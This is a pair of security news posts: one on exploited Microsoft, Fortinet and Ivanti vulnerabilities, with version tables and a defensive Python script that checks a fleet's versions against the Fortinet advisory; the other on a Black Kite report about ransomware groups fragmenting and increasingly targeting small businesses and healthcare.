The following vulnerabilities have been publicly disclosed:

| Product | CVE | Severity | Type | Outcome |
|---|---|---|---|---|
| Microsoft Defender | CVE-2025-26685 | Important | Identity Spoofing | Spoofing of another account over an adjacent network |
| Visual Studio | CVE-2025-32702 | Important | Remote Code Execution | Local code execution by an unauthenticated attacker |

Microsoft also released patches for six critical vulnerabilities that are not known to have been exploited but should be prioritized. They affect Microsoft Office (CVE-2025-30377 and CVE-2025-30386), Microsoft Power Apps (CVE-2025-47733), Remote Desktop Gateway Service (CVE-2025-29967), and Windows Remote Desktop (CVE-2025-29966).

Fortinet

Fortinet has issued a security advisory about a critical vulnerability affecting its FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products. The stack-based buffer overflow vulnerability has been assigned a CVSS v4 severity score of 9.6 (CVSS v3.1: 9.8) and can be exploited by a remote unauthenticated hacker by sending HTTP requests with a specially crafted hash cookie. Successful exploitation of the vulnerability can allow arbitrary code execution.

Fortinet said it has observed exploitation of the vulnerability on FortiVoice. The threat actor scanned the device network, erased system crashlogs, and enabled fcgi debugging to log credentials from the system or SSH login attempts. The vulnerability is tracked as CVE-2025-32756 and affects the following product versions:

| Affected Product | Affected Versions | Fixed Versions |
|---|---|---|
| FortiVoice | 7.2.0 | Upgrade to 7.2.1 or above |
| FortiVoice | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
| FortiVoice | 6.4.0 through 6.4.10 | Upgrade to 6.4.11 or above |
| FortiRecorder | 7.2.0 through 7.2.3 | Upgrade to 7.2.4 or above |
| FortiRecorder | 7.0.0 through 7.0.5 | Upgrade to 7.0.6 or above |
| FortiRecorder | 6.4.0 through 6.4.5 | Upgrade to 6.4.6 or above |
| FortiMail | 7.6.0 through 7.6.2 | Upgrade to 7.6.3 or above |
| FortiMail | 7.4.0 through 7.4.4 | Upgrade to 7.4.5 or above |
| FortiMail | 7.2.0 through 7.2.7 | Upgrade to 7.2.8 or above |
| FortiMail | 7.0.0 through 7.0.8 | Upgrade to 7.0.9 or above |
| FortiNDR | 7.6.0 | Upgrade to 7.6.1 or above |
| FortiNDR | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
| FortiNDR | 7.2.0 through 7.2.4 | Upgrade to 7.2.5 or above |
| FortiNDR | 7.1 (all versions) | Migrate to a fixed release |
| FortiNDR | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
| FortiNDR | 1.1 through 1.5 | Migrate to a fixed release |
| FortiCamera | 2.1.0 through 2.1.3 | Upgrade to 2.1.4 or above |
| FortiCamera | 2.0 (all versions) | Migrate to a fixed release |
| FortiCamera | 1.1 (all versions) | Migrate to a fixed release |

Fortinet has published Indicators of Compromise in its security advisory. If immediate patching is not possible, Fortinet recommends disabling the HTTP/HTTPS administrative interface.
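A practical first step for a defender is to check an appliance inventory against the affected ranges in the table above, since the branches differ per product and some branches have no fix at all. The script below is an added example, not Fortinet's own tooling: it transcribes the CVE-2025-32756 version ranges from this page and triages a constructed sample inventory, treating a branch listed as "all versions" as a prefix match and a range such as "1.1 through 1.5" as inclusive of every build on the 1.5 branch.

```python
"""Fleet triage for CVE-2025-32756 (added example, not Fortinet's own tooling).

The affected/fixed version ranges are transcribed from the advisory table on this
page; the inventory at the bottom is constructed sample data.
"""
from dataclasses import dataclass
from typing import Optional


def parse_version(text: str) -> tuple:
    """'7.0.6' -> (7, 0, 6); a branch such as '7.1' -> (7, 1)."""
    return tuple(int(part) for part in text.strip().split("."))


@dataclass(frozen=True)
class AffectedRange:
    product: str
    low: str                  # first affected version or branch (inclusive)
    high: Optional[str]       # last affected version or branch; None = entire branch
    fixed: Optional[str]      # first fixed version; None = no fixed build in that branch

    def covers(self, version: str) -> bool:
        v = parse_version(version)
        lo = parse_version(self.low)
        if self.high is None:
            # "X.Y all versions": any build on that branch is affected
            return v[:len(lo)] == lo
        hi = parse_version(self.high)
        # Compare against the upper bound at the bound's own precision, so that
        # "1.1 through 1.5" also catches 1.5.3 while "7.0.0 through 7.0.6"
        # stops exactly at 7.0.6.
        return lo <= v and v[:len(hi)] <= hi

    def action(self) -> str:
        if self.fixed:
            return f"Upgrade to {self.fixed} or above"
        return "Migrate to a fixed release"


# Transcribed from the advisory table on this page.
ADVISORY = [
    AffectedRange("FortiVoice", "7.2.0", "7.2.0", "7.2.1"),
    AffectedRange("FortiVoice", "7.0.0", "7.0.6", "7.0.7"),
    AffectedRange("FortiVoice", "6.4.0", "6.4.10", "6.4.11"),
    AffectedRange("FortiRecorder", "7.2.0", "7.2.3", "7.2.4"),
    AffectedRange("FortiRecorder", "7.0.0", "7.0.5", "7.0.6"),
    AffectedRange("FortiRecorder", "6.4.0", "6.4.5", "6.4.6"),
    AffectedRange("FortiMail", "7.6.0", "7.6.2", "7.6.3"),
    AffectedRange("FortiMail", "7.4.0", "7.4.4", "7.4.5"),
    AffectedRange("FortiMail", "7.2.0", "7.2.7", "7.2.8"),
    AffectedRange("FortiMail", "7.0.0", "7.0.8", "7.0.9"),
    AffectedRange("FortiNDR", "7.6.0", "7.6.0", "7.6.1"),
    AffectedRange("FortiNDR", "7.4.0", "7.4.7", "7.4.8"),
    AffectedRange("FortiNDR", "7.2.0", "7.2.4", "7.2.5"),
    AffectedRange("FortiNDR", "7.1", None, None),
    AffectedRange("FortiNDR", "7.0.0", "7.0.6", "7.0.7"),
    AffectedRange("FortiNDR", "1.1", "1.5", None),
    AffectedRange("FortiCamera", "2.1.0", "2.1.3", "2.1.4"),
    AffectedRange("FortiCamera", "2.0", None, None),
    AffectedRange("FortiCamera", "1.1", None, None),
]


def assess(product: str, version: str) -> dict:
    """Classify one (product, version) pair against the advisory ranges."""
    ranges = [r for r in ADVISORY if r.product == product]
    if not ranges:
        # The advisory does not list this product; not evidence of safety.
        return {"status": "not in advisory", "action": "none (product not listed)"}
    for r in ranges:
        if r.covers(version):
            return {"status": "affected", "action": r.action()}
    return {"status": "not affected", "action": "none"}


def triage(inventory) -> list:
    """inventory: iterable of (hostname, product, version) -> one result row per asset."""
    return [dict(host=h, product=p, version=v, **assess(p, v)) for h, p, v in inventory]


# Constructed sample inventory (hostnames and versions are invented).
SAMPLE_INVENTORY = [
    ("fv-01", "FortiVoice", "7.0.6"),
    ("fv-02", "FortiVoice", "7.2.1"),
    ("fm-01", "FortiMail", "7.4.5"),
    ("fndr-01", "FortiNDR", "7.1.2"),
    ("fcam-01", "FortiCamera", "2.0.3"),
    ("fgt-01", "FortiGate", "7.4.3"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print(f"{row['host']:8} {row['product']:12} {row['version']:8} "
              f"{row['status']:16} {row['action']}")
```

The ranges are only as current as the table on this page; re-check them against Fortinet's advisory before acting on the output, and treat a "not in advisory" row as a gap in the data rather than a clean bill of health.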

Ivanti

Ivanti has issued a security advisory about two vulnerabilities affecting the Ivanti Endpoint Manager Mobile (EPMM) solution, one a medium-severity flaw and the other a high-severity flaw. The two vulnerabilities can be chained to allow unauthenticated remote code execution. Ivanti explained that the two vulnerabilities are associated with open-source code used in EPMM, not with Ivanti's own code.

The medium-severity flaw is tracked as CVE-2025-4427 and is an authentication bypass flaw with a CVSS v3.1 severity score of 5.3. The second vulnerability is a remote code execution vulnerability with a CVSS v3.1 severity score of 7.2.

| Affected Product | Affected Versions | Fixed Versions |
|---|---|---|
| Ivanti Endpoint Manager Mobile (EPMM) | 11.12.0.4 and prior | 11.12.0.5 and later |
| Ivanti Endpoint Manager Mobile (EPMM) | 12.3.0.1 and prior | 12.3.0.2 and later |
| Ivanti Endpoint Manager Mobile (EPMM) | 12.4.0.1 and prior | 12.4.0.2 and later |
| Ivanti Endpoint Manager Mobile (EPMM) | 12.5.0.0 and prior | 12.5.0.1 and later |

Ivanti said users should upgrade to the latest version as soon as possible; however, risk can be greatly reduced if the user filters access to the API using the built-in Portal ACLs or an external WAF.

The post Microsoft, Fortinet & Ivanti Warn About Actively Exploited Zero Day Vulnerabilities appeared first on The HIPAA Journal.

Ransomware Attacks Increase 123% in 2 Years with 52 New Groups Emerging in 2024

New research from Black Kite has shed light on the changing ransomware ecosystem. Over the past year, there has been a marked shift from large ransomware syndicates conducting the bulk of attacks to an increasingly fragmented ransomware ecosystem with a growing number of smaller groups and lone actors.

The report is based on data collected by the Black Kite Research & Intelligence Team (BRITE) between April 2024 and March 2025, including victim analysis, dark web intelligence gathering, and continuous monitoring of ransomware operations. Out of the 150 ransomware groups tracked by BRITE, 96 were considered active, having conducted at least one attack in the past 12 months, a sizeable increase from the 61 active ransomware groups in April 2023. Out of the 96 active ransomware groups, 52 are entirely new groups that emerged in the past 12 months. Over that period, there was a 24% year-over-year increase in the number of publicly disclosed ransomware victims (6,046), which follows an 81% increase over the preceding year, amounting to a 123% increase in disclosed ransomware victims in the past two years.

When the ransomware ecosystem was dominated by large ransomware syndicates such as LockBit and ALPHV/BlackCat, there was a degree of predictability to the attacks, but the power vacuum left by the law enforcement operations against LockBit and the shutdown of ALPHV has led to the creation of many smaller groups, with some of the more experienced actors branching out on their own. With so many new groups, the ransomware ecosystem has become more chaotic, with less sophisticated attacks being conducted in greater volume. BRITE reports that these smaller groups tend to lack the infrastructure, discipline, and credibility of their predecessors, and this shift has resulted in an increase in attack volume, a fall in coordination, and growing unpredictability in how, where, and why attacks unfold.

One trend that has emerged is a shift from attacks on larger companies with deeper pockets to attacks on small to medium-sized businesses (SMBs), which tend to have poorer defenses and smaller cybersecurity teams, and carry a lower risk of retaliation from law enforcement. The potential rewards from conducting the attacks are lower, with BRITE reporting a 35% reduction in ransom payment values in the past 12 months; however, the overall impact of ransomware attacks has widened. In 2024, the average ransom demand was $4.24 million, the median ransom payment was $2 million, and the average ransom payment was $553,959. SMBs with between $4 and $8 million appear to be the sweet spot in terms of ease of conducting attacks and ransom payment value.

In terms of targets, ransomware groups tend to conduct strategic attacks with the top three targets unchanged year-over-year. Manufacturing was the most targeted sector with 1,315 victims over the past 12 months. Attacks on the sector tend to result in massive disruption to business operations, with the costs of downtime increasing the probability of ransoms being paid. Professional and technical services were the second-most targeted sector with 1,040 attacks, followed by healthcare and social assistance with 434 known attacks.

In terms of the growth of attacks on different sectors, excluding the mass exploitation of vulnerabilities by the Clop group as an outlier, wholesale trade saw the biggest growth with a 2.27% increase in attacks, with healthcare and social assistance in second with 1.44% growth. Physicians and health practitioners overtook hospitals in terms of victim count, as they tend to have far weaker security, lack dedicated security teams, and handle reasonable volumes of sensitive patient data, making them low-hanging fruit with significant extortion potential. These smaller healthcare providers accounted for 38% of attacks, with hospitals in second spot (20%), social assistance in third (11%), and nursing and residential facilities in fourth (9%).

BRITE also reports deeper entanglement in supply chains, with ransomware groups increasingly targeting third-party vendors, as an attack on a vendor can easily allow the ransomware actor to attack and attempt extortion on dozens of downstream organizations. BRITE reports that ransomware was behind 67% of all known third-party breaches. “Incidents involving Change Healthcare, Blue Yonder, and CDK Global made clear that ransomware’s impact is no longer contained within the four walls of the initially affected organization,” explained Black Kite in the report. “When threat actors compromise a widely used vendor, the effects ripple outward, paralyzing downstream businesses in multiple sectors. In this way, ransomware is increasingly a supply chain problem, not just a cybersecurity one.”

Black Kite predicts a deepening fragmentation of the ransomware ecosystem over the coming year, an increase in double targeting of victims with different ransomware variants deployed in a short space of time, speedier attacks with reduced dwell time between initial access and ransomware deployment, and increased automation and AI-assisted reconnaissance.

The post Ransomware Attacks Increase 123% in 2 Years with 52 New Groups Emerging in 2024 appeared first on The HIPAA Journal.